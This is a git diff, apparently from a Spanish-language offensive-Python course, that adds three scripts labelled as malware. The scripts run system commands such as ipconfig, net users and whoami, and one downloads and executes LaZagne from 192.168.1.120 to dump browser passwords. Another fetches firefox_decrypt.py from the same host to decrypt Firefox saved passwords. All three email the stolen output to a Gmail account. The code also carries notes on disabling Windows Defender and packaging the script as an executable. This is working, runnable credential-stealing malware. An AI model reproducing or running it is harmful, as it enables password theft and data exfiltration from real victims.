Add malware

python-ofensivo/15_hacking/10_malware/01_malware.py

@@ -0,0 +1,68 @@
+#!/usr/bin/env python3
+"""
+Malware - Envío del resultado de comandos por correo
+
+Algunas librerías necesitarán instalación si se ejecuta con python directamente.
+"""
+
+import dotenv
+import os
+import subprocess
+import smtplib
+from email.mime.text import MIMEText
+
+
+def run_command(command):
+    """
+    Ejecutor de comandos
+    """
+
+    output_command = subprocess.check_output(command, shell=True)
+
+    return output_command.decode('cp850')
+
+
+def send_email(subject, body, sender, recipients, password):
+    """
+    Envia un email con el reporte configurado
+    """
+
+    msg = MIMEText(body)
+    msg['Subject'] = subject
+    msg['From'] = sender
+    msg['To'] = ', '.join(recipients)
+
+    with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
+
+        smtp_server.login(sender, password)
+        smtp_server.sendmail(sender, recipients, msg.as_string())
+
+    print(f"[i] Email sent Successfully!\n")
+
+
+if __name__ == '__main__':
+
+    dotenv.load_dotenv()
+    app_passwd = os.getenv("APP_PASSWD")
+
+    ipconfig_output = run_command("ipconfig")
+
+    # Primer correo
+    send_email(
+        "ipconfig INFO",
+        ipconfig_output,
+        "keyloggerseginf@gmail.com",
+        ["keyloggerseginf@gmail.com"],
+        app_passwd
+    )
+
+    users_info = run_command("net users")
+
+    # Segundo correo
+    send_email(
+        "users INFO",
+        users_info,
+        "keyloggerseginf@gmail.com",
+        ["keyloggerseginf@gmail.com"],
+        app_passwd
+    )

python-ofensivo/15_hacking/10_malware/02_malware.py

@@ -0,0 +1,85 @@
+#!/usr/bin/env python3
+"""
+Malware - LaZagne
+
+LaZagne.exe https://github.com/AlessandroZ/LaZagne
+
+Este virus no se puede ejecutar con el Windows Defender activado.
+
+Si lo desactivamos, LaZagne recogerá las contraseñas de los navegadores y lo 
+enviará por correoç
+
+Algunas librerías necesitarán instalación si se ejecuta con python directamente.
+
+"""
+
+import dotenv
+import os
+import requests
+import subprocess
+import smtplib
+import tempfile
+from email.mime.text import MIMEText
+
+
+def run_command(command):
+    """
+    Ejecutor de comandos
+    """
+
+    output_command = subprocess.check_output(command, shell=True)
+
+    return output_command.decode('cp850')
+
+
+def send_email(subject, body, sender, recipients, password):
+    """
+    Envia un email con el reporte configurado
+    """
+
+    msg = MIMEText(body)
+    msg['Subject'] = subject
+    msg['From'] = sender
+    msg['To'] = ', '.join(recipients)
+
+    with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
+
+        smtp_server.login(sender, password)
+        smtp_server.sendmail(sender, recipients, msg.as_string())
+
+    print(f"[i] Email sent Successfully!\n")
+
+
+def download_and_execute_lazagne():
+
+    r = requests.get("http://192.168.1.120/LaZagne.exe")
+
+    temp_file = tempfile.mkdtemp()
+
+    os.chdir(temp_file)
+
+    with open("LaZagne.exe", "wb") as f:
+
+        f.write(r.content)
+
+    lazagne_output = run_command("LaZagne.exe browsers")
+
+    os.remove("LaZagne.exe")
+
+    return lazagne_output
+
+
+if __name__ == '__main__':
+
+    output = download_and_execute_lazagne()
+
+    dotenv.load_dotenv()
+    app_passwd = os.getenv("APP_PASSWD")
+
+    send_email(
+        "LaZagne Browser INFO",
+        output,
+        "keyloggerseginf@gmail.com",
+        ["keyloggerseginf@gmail.com"],
+        app_passwd
+    )

python-ofensivo/15_hacking/10_malware/03_malware.py

@@ -0,0 +1,129 @@
+#!/usr/bin/env python3
+# coding: cp850
+"""
+Malware - firefox_decrypt.py
+
+Firefox Decrypt https://github.com/unode/firefox_decrypt
+
+La construcción del ejecutables es con pyinstaller y se ejecuta así:
+
+pyinstaller --oneline malware.py
+
+Para que funcione el .exe se debe harcodear el password y no usar dotenv
+
+"""
+
+import dotenv
+import os
+import requests
+import subprocess
+import sys
+import smtplib
+import tempfile
+from email.mime.text import MIMEText
+
+
+def run_command(command):
+    """
+    Ejecutor de comandos
+    """
+
+    try:
+
+        output_command = subprocess.check_output(command, shell=True)
+
+        return output_command.decode('cp850').strip()
+
+    except Exception as e:
+
+        print(f"\n[!] Error al ejecutar el comando {command}.\nError: {e}")
+
+        return None
+
+
+def send_email(subject, body, sender, recipients, password):
+    """
+    Envia un email con el reporte de teclas presionadas
+    """
+
+    msg = MIMEText(body)
+    msg['Subject'] = subject
+    msg['From'] = sender
+    msg['To'] = ', '.join(recipients)
+
+    with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
+
+        smtp_server.login(sender, password)
+        smtp_server.sendmail(sender, recipients, msg.as_string())
+
+    print(f"[i] Email sent Successfully!\n")
+
+
+def get_firefox_profiles(username):
+
+    path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
+
+    try:
+        profiles = [profile for profile in os.listdir(
+            path) if "release" in profile]
+
+        return profiles[0] if profiles else None
+
+    except Exception as e:
+
+        print(f"\n[!] Error al obtener el profile de Firefox.\nError: {e}")
+
+        return None
+
+
+def get_firefox_passwords(username, profiles):
+
+    r = requests.get("http://192.168.1.120/firefox_decrypt.py")
+
+    temp_dir = tempfile.mkdtemp()
+
+    os.chdir(temp_dir)
+
+    with open("firefox_decrypt.py", "wb") as f:
+
+        f.write(r.content)
+
+    command = f"python firefox_decrypt.py C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\{profiles}"
+
+    passwords = run_command(command)
+
+    os.remove("firefox_decrypt.py")
+
+    return passwords
+
+
+if __name__ == '__main__':
+
+    username_str = run_command("whoami")
+    username = username_str.split("\\")[1]
+
+    profiles = get_firefox_profiles(username)
+
+    if not username or not profiles:
+
+        sys.exit(
+            f"\n[!] No ha sido posible obtener el nombre de usuario o el profile válido de firefox")
+
+    passwords = get_firefox_passwords(username, profiles)
+
+    if passwords:
+
+        dotenv.load_dotenv()
+        app_passwd = os.getenv("APP_PASSWD")
+
+        send_email(
+            "Decrypted Firefox Passwords INFO",
+            passwords,
+            "keyloggerseginf@gmail.com",
+            ["keyloggerseginf@gmail.com"],
+            app_passwd
+        )
+
+    else:
+
+        print(f"[!] No se han encontrado contraseñas")